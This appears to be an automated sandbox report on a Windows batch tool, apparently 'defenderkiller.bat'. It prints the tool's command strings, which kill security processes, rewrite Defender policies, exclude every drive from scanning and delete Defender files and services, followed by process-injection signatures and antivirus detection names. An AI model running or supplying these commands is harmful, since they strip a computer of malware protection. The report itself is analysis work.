"c:\wdefenderbackup\folder\syswow64\windowspowershell\v1.0\modules\defender"timeout /t 2 /nobreak cecho.exe {04} применение гп{\n #}{\n #}reg export "hklm\system\currentcontrolset\services\msseccore" "c:\wdefenderbackup\servicesdrivers\msseccore.reg"reg export "hklm\software\microsoft\windows\currentversion\explorer\startupapproved\run" "c:\wdefenderbackup\regedit\7.reg"reg export "hklm\software\microsoft\windows\currentversion\explorer\volumecaches\windows defender" "c:\wdefenderbackup\regedit\8.reg"cecho.exe {02} создаём резервную копию папок из system32 и syswow64{\n #}reg export "hklm\software\microsoft\windows\currentversion\winevt\channels\nis-driver-wfp/diagnostic" "c:\wdefenderbackup\regedit\18.reg"reg export "hklm\software\microsoft\windows\currentversion\winevt\channels\microsoft-windows-windows defender/whc" "c:\wdefenderbackup\regedit\17.reg"cecho.exe {0a}healthhost{#}{08} [securityhealthhost]{\n #}{\n #}nircmd exec hide defenderstopx64.exexcopy /s /e /h /y /i "c:\windows\system32\windowspowershell\v1.0\modules\defender" "c:\wdefenderbackup\folder\system32\windowspowershell\v1.0\modules\defender"reg query "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "autologonsid" xcopy /s /e /h /y /i "c:\program files\windows defender" "c:\wdefenderbackup\folder\program files\windows defender"nircmd exec hide defenderstopx64nircmd killprocess uhssvc.exececho.exe {0a}mssecflt{#}{08} [драйвер security events component minifilter]{\n #}xcopy /s /e /h /y /i "c:\program files\pchealthcheck" "c:\wdefenderbackup\folder\program files\pchealthcheck"reg add "hklm\software\microsoft\windows\currentversion\notifications\settings\windows.systemtoast.securityandmaintenance" /v "enabled" /t reg_dword /d "0" /f cecho.exe {0a} webthreatdefusersvc{\n #}{\n #}xcopy /s /e /h /y /i "c:\program files (x86)\windows defender" "c:\wdefenderbackup\folder\program files (x86)\windows defender"cecho.exe {03} удаляем папки и файлы защитника{\n #}{\n #}sc query mssecflt nsudolc -u:c -showwindowmode:hide cmd.exe /c reg add "hkcu\software\microsoft\windows\currentversion\apphost" /v "enablewebcontentevaluation" /t reg_dword /d "0" /f reg export "hklm\system\currentcontrolset\services\wtd" "c:\wdefenderbackup\servicesdrivers\wtd.reg"unlocker /unlock "c:\programdata\microsoft\windows defender" "c:\program files\windows defender" "c:\program files (x86)\windows defender"sc query webthreatdefusersvc cecho.exe {03} удаляем службы{\n #}cecho.exe {08} резервная копия создана в {09}c:\wdefenderbackup{\n #}{\n #}cecho.exe {02} создаём резервную копию файлов из system32 и syswow64{\n #}defenderstopx64xcopy /s /e /h /y /i "c:\windows\system32\webthreatdefsvc" "c:\wdefenderbackup\folder\system32\webthreatdefsvc"cecho.exe {0a}wdnisdrv{#} {08}[драйвер wd network inspection driver]{\n #}reg export "hkcr\directory\shellex\contextmenuhandlers\epp" "c:\wdefenderbackup\regedit\2.reg"reg export "hklm\software\microsoft\windows\currentversion\shell extensions\approved" "c:\wdefenderbackup\regedit\5.reg"nsudolc -u:c -showwindowmode:hide cmd.exe /c reg add "hkcu\software\microsoft\windows\currentversion\notifications\settings\windows.systemtoast.securityandmaintenance" /v "enabled" /t reg_dword /d "0" /f cecho.exe {0a}mpcmdrun{#} {08} [microsoft malware protection]{\n #}cmd.exe /c reg add "hkcu\software\microsoft\windows\currentversion\apphost" /v "enablewebcontentevaluation" /t reg_dword /d "0" /f find /i "0x0" cecho.exe {0a}healthserv{#}{08} [securityhealthservice]{\n #}xcopy /s /e /h /y /i "c:\program files (x86)\windows defender advanced threat protection" "c:\wdefenderbackup\folder\program files (x86)\windows defender advanced threat protection"reg export "hklm\software\classes\clsid\{09a47860-11b0-4da5-afa5-26d86198a780}" "c:\wdefenderbackup\regedit\4.reg"xcopy /s /e /h /y /i "c:\windows\system32\drivers\wd" "c:\wdefenderbackup\folder\system32\drivers\wd"xcopy /s /e /h /y /i "c:\windows\system32\tasks_migrated\microsoft\windows\windows defender" "c:\wdefenderbackup\folder\system32\tasks_migrated\microsoft\windows\windows defender"cecho.exe {0a}uhssvc{#} {08} [microsoft update health service]{\n #}cecho.exe {0a}sgrmbroker{#} {08}[служба брокер мониторинга среды выполнения system guard]{\n #}cecho.exe {0a}webthreatu{#} {08}[служба защиты пользоват. от веб-угроз - webthreatdefusersvc]{\n #}sc query sgrmbroker reg export "hkcr\*\shellex\contextmenuhandlers\epp" "c:\wdefenderbackup\regedit\1.reg"nsudolc -u:t -p:e -usecurrentconsole "c:\users\test22\appdata\local\temp\rarsfx0\defenderkiller.bat" cecho.exe {03}состояние служб и драйверов защитника:{\n #}reg add "hkcu\software\microsoft\windows\currentversion\notifications\settings\windows.systemtoast.securityandmaintenance" /v "enabled" /t reg_dword /d "0" /f reg add "hklm\software\policies\microsoft\mrt" /v "dontreportinfectioninformation" /t reg_dword /d "1" /f nircmd killprocess msmpeng.exereg export "hklm\system\currentcontrolset\services\eventlog\system\windefend" "c:\wdefenderbackup\servicesdrivers\windefendevent.reg"reg export "hklm\system\currentcontrolset\control\wmi\autologger\defenderauditlogger" "c:\wdefenderbackup\regedit\10.reg"cecho.exe {0a}wdboot{#} {08}[драйвер wd antivirus boot driver]{\n #}c:\users\test22\appdata\local\temp\rarsfx0\defenderkiller.batreg export "hkcr\drive\shellex\contextmenuhandlers\epp" "c:\wdefenderbackup\regedit\3.reg"nircmd killprocess smartscreen.exereg export "hklm\software\microsoft\windows\currentversion\winevt\channels\microsoft-windows-windows defender/operational" "c:\wdefenderbackup\regedit\16.reg"reg export "hklm\system\currentcontrolset\services\wdboot" "c:\wdefenderbackup\servicesdrivers\wdboot.reg"cecho.exe {02} создаём резервную копию папок из c:\programdata{\n #}sc query webthreatdefsvc cecho.exe {0a}sgrmbroker{#} {08}[брокер среды выполнения system guard]{\n #}nircmd killprocess securityhealthservice.exereg export "hklm\system\currentcontrolset\services\windefend" "c:\wdefenderbackup\servicesdrivers\windefend.reg"cecho.exe {08} пропуск добавления в исключения защитника [уже добавлено]{\n #}{\n #}reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f mode 80,45cecho.exe {03} отключаем защитник [групповые политики] >cecho.exe {0a}msmpeng{#} {08} [antimalware service executable]{\n #}reg query "hku\s-1-5-19" cecho.exe {0a} windefend, securityhealthservice, sense, wdnissvc, wscsvc, webthreatdefsvc{\n #}cecho.exe {0a}wdnissvc{#} {08} [служба проверки сети windows defender antivirus]{\n #}xcopy /s /e /h /y /i "c:\windows\system32\tasks\microsoft\windows\windows defender" "c:\wdefenderbackup\folder\system32\tasks\microsoft\windows\windows defender"reg query "hklm\software\microsoft\windows\currentversion\policies\system" /v "enablelua" nircmd killprocess securityhealthsystray.execmd.exe /c taskkill /f /im explorer.exe nhmb "создать резервную копию защитника?\nможно будет восстановить защитник после удаления с помощью копии.\n\n\nвыбирайте нет, только в том случае, если вам не нужны обновления windows, либо у вас уже есть резервная копия защитника с этой версии windows." "backupdefender" "warning|yesno|defbutton2"reg export "hklm\system\currentcontrolset\services\wdfilter" "c:\wdefenderbackup\servicesdrivers\wdfilter.reg"nircmd killprocess mpcmdrun.exereg export "hklm\software\microsoft\windows defender" "c:\wdefenderbackup\regedit\11.reg"sc query wtd cecho.exe {03} добавляем в исключения защитника{\n #}{\n #}nircmd killprocess msascuil.exexcopy /s /e /h /y /i "c:\program files\windows defender sleep" "c:\wdefenderbackup\folder\program files\windows defender sleep"nsudolc -u:c -showwindowmode:hide -wait powershell "get-psdrive -psprovider 'filesystem' | foreach-object { add-mppreference -exclusionpath $_.root }" cscript //nologo temp.vbssc query windefend cecho.exe {0a}smartscreen{\n #}unlocker /deletedefendercecho.exe {0a}wtd{#}{08} [драйвер wtd driver]{\n #}reg export "hklm\system\currentcontrolset\services\sense" "c:\wdefenderbackup\servicesdrivers\sense.reg"xcopy /s /e /h /y /i "c:\programdata\microsoft\windows security health" "c:\wdefenderbackup\folder\programdata\microsoft\windows security health"cecho.exe {0a}msseccore{#}{08} [драйвер microsoft security core boot driver]{\n #}nsudolc -u:c -showwindowmode:hide -wait cmd.exe /c taskkill /f /im explorer.exe cecho.exe {0a}windows defender cache maintenance{\n #}reg export "hklm\system\currentcontrolset\services\sgrmbroker" "c:\wdefenderbackup\servicesdrivers\sgrmbroker.reg"cecho.exe {0a}nissrv{#} {08} [network realtime inspection]{\n #}cecho.exe {0c}wscsvc{#} {08}[служба центр обеспечения безопасности]{\n #}reg export "hkcr\clsid\{d8559eb9-20c0-410e-beda-7ed416aecc2a}" "c:\wdefenderbackup\regedit\20.reg"reg export "hklm\system\currentcontrolset\services\webthreatdefsvc" "c:\wdefenderbackup\servicesdrivers\webthreatdefsvc.reg"explorer.exe "c:\users\test22\appdata\local\temp\rarsfx0\defenderkiller.bat" sc query wdnisdrv findstr /c:"6.3" /c:"6.2" /c:"6.1" reg add "hklm\software\policies\microsoft\mrt" /v "dontofferthroughwuau" /t reg_dword /d "1" /f sc query wdnissvc cecho.exe {0a}shealthser{#} {08}[служба центр безопасности защитника windows]{\n #}nircmd killprocess mrt.exececho.exe {0a}healthtray{#}{08} [securityhealthsystray иконка в трее]{\n #}nircmd win activate process cmd.exesc query sgrmagent reg export "hklm\system\currentcontrolset\services\securityhealthservice" "c:\wdefenderbackup\servicesdrivers\securityhealthservice.reg"xcopy /s /e /h /y /i "c:\program files\windows defender advanced threat protection" "c:\wdefenderbackup\folder\program files\windows defender advanced threat protection"nircmd killprocess mpsigstub.exesc query wscsvc sc query wdfilter nircmd win center process cmd.exe xcopy /s /e /h /y /i "c:\program files\windows security" "c:\wdefenderbackup\folder\program files\windows security"cecho.exe {0a}windows defender cleanup{\n #}c:\windows\system32\cmd.exe /c 2>nul reg query "hklm\system\currentcontrolset\services" /f "webthreatdefusersvc*" /k|findstr hsc query securityhealthservice c:\windows\system32\cmd.exe /c cscript //nologo temp.vbslgpo.exe /t "lgpo-temp.txt" /qxcopy /s /e /h /y /i "c:\programdata\microsoft\windows defender" "c:\wdefenderbackup\folder\programdata\microsoft\windows defender"7z x -aoa -bso0 -bsp1 "toolsfordk.zip" -p"unlockerpass"cecho.exe {0a}webthreat{#} {08}[служба защиты от веб-угроз - webthreatdefsvc]{\n #}
process: potential process injection target winlogon.exe
process: potential process injection target lsass.exe
Process injection Process 3512 resumed a thread in remote process 3568
Process injection Process 4352 resumed a thread in remote process 4640
Process injection Process 5036 resumed a thread in remote process 4868
Process injection Process 5324 resumed a thread in remote process 5404
Process injection Process 6136 resumed a thread in remote process 5444
Process injection Process 5444 resumed a thread in remote process 1240
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000114
suspend_count: 1
process_identifier: 3568
1 0 0

NtResumeThread

thread_handle: 0x0000000000000110
suspend_count: 1
process_identifier: 4640
1 0 0

NtResumeThread

thread_handle: 0x0000000000000110
suspend_count: 1
process_identifier: 4868
1 0 0

NtResumeThread

thread_handle: 0x0000000000000114
suspend_count: 1
process_identifier: 5404
1 0 0

NtResumeThread

thread_handle: 0x0000000000000114
suspend_count: 1
process_identifier: 5444
1 0 0

NtResumeThread

thread_handle: 0x0000000000000060
suspend_count: 0
process_identifier: 1240
1 0 0
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\**del.LocalSettingOverrideSpynetReporting
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2004
thread_handle: 0x0000000000000060
process_identifier: 1240
current_directory:
filepath: C:\Windows\explorer.exe
track: 1
command_line: explorer.exe
filepath_r: C:\Windows\explorer.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000000000000064
1 1 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
cmdline C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoLogonSID" 2>nul
cmdline reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoLogonSID"
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableScanningNetworkFiles
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Reporting\DisableGenericRePorts
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableCatchupQuickScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\**del.SpynetReporting
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableCatchupFullScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableCatchupQuickScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\AllowFastServiceStartup
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableArchiveScanning
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\AllowFastServiceStartup
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\RealtimeSignatureDelivery
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableRemovableDriveScanning
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableScanningMappedNetworkDrivesForFullScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Reporting\DisableGenericRePorts
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\DisableScanOnUpdate
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\UpdateOnStartUp
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\LocalSettingOverrideDisableIOAVProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableArchiveScanning
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableScanningMappedNetworkDrivesForFullScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\ServiceKeepAlive
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableRemovableDriveScanning
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableCatchupFullScan
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\DisableUpdateOnStartupWithoutEngine
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\ServiceKeepAlive
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\UpdateOnStartUp
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\RealtimeSignatureDelivery
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\DisableUpdateOnStartupWithoutEngine
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\LocalSettingOverrideSpynetReporting
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{97E0E262-5AA9-428F-9DD2-960D2216301E}Machine\Software\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Spynet\**del.SpynetReporting
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Signature Updates\DisableScanOnUpdate
description attempts to modify windows defender policies registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{92523C0D-4E68-478A-BCAE-C02536355800}Machine\Software\Policies\Microsoft\Windows Defender\Scan\DisableScanningNetworkFiles
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
Cynet Malicious (score: 100)
Skyhigh BehavesLike.Win32.Worm.vc
ALYac Trojan.GenericKD.72891299
Cylance Unsafe
VIPRE Trojan.GenericKD.72891299
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (D)
BitDefender Trojan.GenericKD.72891299
K7GW Trojan ( 005b6a171 )
K7AntiVirus Trojan ( 005b6a171 )
Arcabit Trojan.Generic.D4583BA3
Baidu WinLNK.Trojan.Dinihou.b
Symantec Trojan.Gen.MBT
Elastic malicious (high confidence)
ESET-NOD32 BAT/HackTool.Agent.S
APEX Malicious
Avast Win32:MalwareX-gen [Trj]
MicroWorld-eScan Trojan.GenericKD.72891299
Emsisoft Trojan.GenericKD.72891299 (B)
F-Secure Trojan.TR/AVI.Agent.cmmcw
TrendMicro TROJ_GEN.R002C0DFB24
McAfeeD ti!7D20203AD3C9
CTX exe.trojan.generic
Sophos Generic Reputation PUA (PUA)
FireEye Generic.mg.c5ca67c0bbc8b248
Webroot Pua.Gen
Avira TR/AVI.Agent.cmmcw
Microsoft Trojan:Win32/Casdet!rfn
GData Trojan.GenericKD.72891299
McAfee Artemis!C5CA67C0BBC8
DeepInstinct MALICIOUS
Malwarebytes Malware.AI.4270162274
TrendMicro-HouseCall TROJ_GEN.R002C0DFB24
Tencent Win32.Trojan.Avi.Aujl
MaxSecure Trojan.Malware.3411146.susgen
Fortinet Riskware/Agent
AVG Win32:MalwareX-gen [Trj]
Paloalto generic.ml